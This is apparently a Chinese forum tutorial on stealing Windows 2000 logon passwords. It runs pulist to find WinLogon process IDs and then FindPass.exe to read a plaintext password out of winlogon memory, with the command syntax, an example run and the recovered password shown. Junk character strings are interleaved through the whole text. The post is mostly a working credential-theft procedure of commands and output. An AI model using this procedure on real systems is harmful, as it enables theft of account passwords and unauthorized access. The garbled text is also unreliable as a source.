一、先使用 pulist 查看登录域名信息
, J: \/ P. m0 N% A2 f- L3 L! N, {8 ^. M( b( M8 s: a D& z7 |
C:\Documents and Settings\bingle>pulist
7 F- U& O# G5 p- I: F& W3 F) }( M" t" y* K+ m' T1 B, j* D% I
Process PID User
9 {$ L9 w; W# M6 V4 U* h
Idle 0
+ \. A9 d0 s' {/ D+ u2 oSystem 8
* s$ [/ A& ?: o
smss.exe 164 NT AUTHORITY\SYSTEM
H1 q( n2 o5 ~" u6 g) V" ^
csrss.exe 192 NT AUTHORITY\SYSTEM
8 g, }: l( Z) b& [% }
winlogon.exe 188 NT AUTHORITY\SYSTEM ( h) |6 h. U& J1 y; r+ |
wins.exe 1212 NT AUTHORITY\SYSTEM
" h5 \8 R- o9 V3 `
Explorer.exe 388 TEST-2KSERVER\Administrator
0 m( m |: F2 Q
internat.exe 1828 TEST-2KSERVER\Administrator
3 O, r8 ?2 B# q8 t n8 j7 J+ wconime.exe 1868 TEST-2KSERVER\Administrator
4 F5 C7 B+ _6 I* J/ U
msiexec.exe 1904 NT AUTHORITY\SYSTEM
' S) d# Z$ Q# G5 W/ z
tlntsvr.exe 1048 NT AUTHORITY\SYSTEM
% D1 Y- w6 @: k; F9 Ftaskmgr.exe 1752 TEST-2KSERVER\Administrator
& D l7 k- Y, H. p( Ycsrss.exe 2056 NT AUTHORITY\SYSTEM
. R. w$ s8 Z9 K
winlogon.exe 2416 NT AUTHORITY\SYSTEM 9 ?9 D5 m% N7 y; l+ c( G% p
rdpclip.exe 2448 TEST-2KSERVER\clovea
8 O1 f, T5 H# J7 p" K9 cExplorer.exe 2408 TEST-2KSERVER\clovea
+ d5 m7 @& H; E6 Cinternat.exe 1480 TEST-2KSERVER\clovea
) ` r0 \, ?# S5 h2 i4 R, j% acmd.exe 2508 TEST-2KSERVER\Administrator
# _9 P! S+ }0 M3 gntshell.exe 368 TEST-2KSERVER\Administrator
9 F) K. k' \3 Y Q( s$ f
ntshell.exe 1548 TEST-2KSERVER\Administrator
; Q. S: Q3 Z5 T# H& n4 Z5 Mntshell.exe 1504 TEST-2KSERVER\Administrator
/ V( ^& x9 k6 C) b) }
csrss.exe 1088 NT AUTHORITY\SYSTEM
+ w7 ]* z1 Y6 G% q2 h
winlogon.exe 1876 NT AUTHORITY\SYSTEM
& n5 p/ S" t5 p- X, T, Krdpclip.exe 1680 TEST-2KSERVER\bingle
/ H4 W7 i M+ o1 pExplorer.exe 2244 TEST-2KSERVER\bingle
0 d; k, ]$ T) |$ T% Z
conime.exe 2288 TEST-2KSERVER\bingle
( P+ t( @1 e5 u
internat.exe 1592 TEST-2KSERVER\bingle
5 f0 k. u. i: D& b4 {' d6 V( R r, mcmd.exe 1692 TEST-2KSERVER\bingle
Y9 M' Y/ r: x y5 y5 B' N
mdm.exe 2476 TEST-2KSERVER\bingle
6 f+ x0 k2 U) ~) f s5 z
taskmgr.exe 752 TEST-2KSERVER\bingle
) c8 \1 |% a, z9 P- t, i
pulist.exe 2532 TEST-2KSERVER\bingle
0 e. O5 P3 ], S* d) _6 M) ^5 ~) @* ~5 u7 ?% Y5 z( Q9 D0 v
三组红色的 WinLogON 分别代表 Administrator、Clovea 和 bingle 三个用户的,其 PID 值也分属那三组用户的 PID 值。
0 C+ e# F# H& X3 x& m h
. [. I7 d- W2 q1 E) H% d- b
知道了PID值后看下一步:
8 h( e0 ~5 E+ Y: z
: f8 @) c% p3 Z: _6 Y' N/ v" j! K4 |4 g
二、使用 Findpass 获取密码3 Q; r/ N$ P+ o# h# e
# x7 W4 o" G4 n( s3 ~& d# I
语法: findpass.exe [DomainName] [UserName] [PID-of-WinLogon]
7 w% g) e3 _" j3 a) N
6 ^7 q4 [; R' A X/ @ [DomainName] :上述表中用户名斜框前的域名,如 TEST-2KSERVER
% K* B# r+ k: F+ S. j! r8 h, H [UserName] :要获取密码的帐号名,如 Administrator 或 bingle 等
/ A; s/ ^" R- ^% t5 l! W" v [PID-of-WinLogon]:上述表中查询到的对应的 PID 值
: y/ T( l. Z, X7 h( l6 u
0 {7 Q( i* h6 w+ e! O* N) q
实例:
" F7 V4 t4 _: x/ P# [( R6 f, {: y& m
C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER administrator 188
, X. h1 M0 @+ ^( s0 Z3 Q% l
, W3 q7 q7 Z- W% L2 z, iTo Find Password in the Winlogon process
7 }6 K; {; c0 F6 k
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon
; N- _/ a( I& l
- T/ Y% p. ?; F% z8 d( M
The debug privilege has been added to PasswordReminder.
' W# r0 t, X& Q# FThe WinLogon process id is 188 (0x000000bc).
/ K$ c0 h' M$ E+ `: ]) H6 i, }% @2 E
To find TEST-2KSERVER\administrator password in process 188 ...
. ^$ \# U. R+ tThe encoded password is found at 0x008e0800 and has a length of 10.
) O8 W+ C! A$ {2 p$ g/ q9 QThe logon information is:
TEST-2KSERVER/administrator/testserver.
, p9 |3 l: b( y- Y' c$ u, v
The hash byte is: 0x13.
6 T! ?. ?5 T6 ]% G
& z& h, ]0 p& K$ d6 r
# v9 Q4 @! y' xoh.yeah..................
( p% h! t! {; a- c! _. `! ~" w
$ n1 L5 K4 r% W) a1 S+ _3 ]. R! {: w红色部分三个值分别代表域名、帐号名和密码,也就是
* c* I0 s' k E9 u' R' D" d域名:TEST-2KSERVER
5 `) D1 s7 r; h3 ^# Z W8 F) ~0 B帐号:administrator
' R) m& q4 T6 B# v密码:testserver
# N8 |; k+ a- v* X* A6 Z
8 C* b, B6 b* T4 X2 f
" }, ~2 S; s7 K本帖隐藏的内容需要回复才可以浏览
